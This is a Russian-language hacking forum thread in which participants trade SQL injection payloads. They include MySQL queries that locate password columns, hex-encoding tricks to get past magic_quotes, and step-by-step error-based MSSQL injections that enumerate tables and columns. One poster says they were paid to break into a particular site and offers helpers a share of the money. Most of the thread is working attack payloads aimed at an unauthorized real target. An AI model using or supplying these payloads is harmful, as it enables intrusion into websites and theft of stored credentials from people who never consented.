если это 5 ветка, то в information_schema.columns есть колонка table_schema - название базы сделай где то так select concat_ws(0x3a,table_schema,table_name,column_name) from information_schema.columns where column_name like '%pass%' // выбрать название базы + таблицы + колонки где встречается pass
1. Это ты мне пишешь? )) 2. Зачем так извращаться, гораздо проще, просто посмотреть в какой бд лежит таблица.
если так делать, то название колонки лучше закодировать в 0xhex, чтобы избежать лишних столкновений с magic_quotes=on
все снова хай! Надеюсь в этот раз вы мне поможите! ) Есть скуль на сайте, база mssql (юзер sa!) Пытаюсь вывести имена колонок Но имя второй вывести не могу Такой вариант тоже не работает Выводит одну и туже колонку nvarchar value 'AddLine1' to data type Что делать? Как вывести имена колонок?
Ты вначале таблицы хоть выведи. Code: (SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES)-- Получишь что-то типо: Syntax error converting the nvarchar value 'таблица' to a column of data type int. Code: (SELECT+TOP+1+TABLE_NAME+FROM+IN FORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(' таблица'))-- А потом, с нужной таблицы уже выводишь колонки. Code: (SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_ SCHEMA.COLUMNS+WHERE+TABLE_NAME='таблица')- Code: (SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_ SCHEMA.COLUMNS+WHERE+TABLE_NAME='table_name'+AND+C OLU MN_NAME+NOT+IN+('колонка'))--
то что я показал это пример, и на твоём конечно может не сработать, лучше брось ссылку, так будет быстрее и нагляднее
без ссылки никак? мне просто этот сайт взломать заказали а я первый раз с такой хней встречаюсь, до этого сайты c mssql уже ломал так что с синтаксисом все ok P.S: кто поможет, % получит! )
1'+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+information_schema. columns+where+table_name=0x74626C4163636F756E7473)-- Он про это.
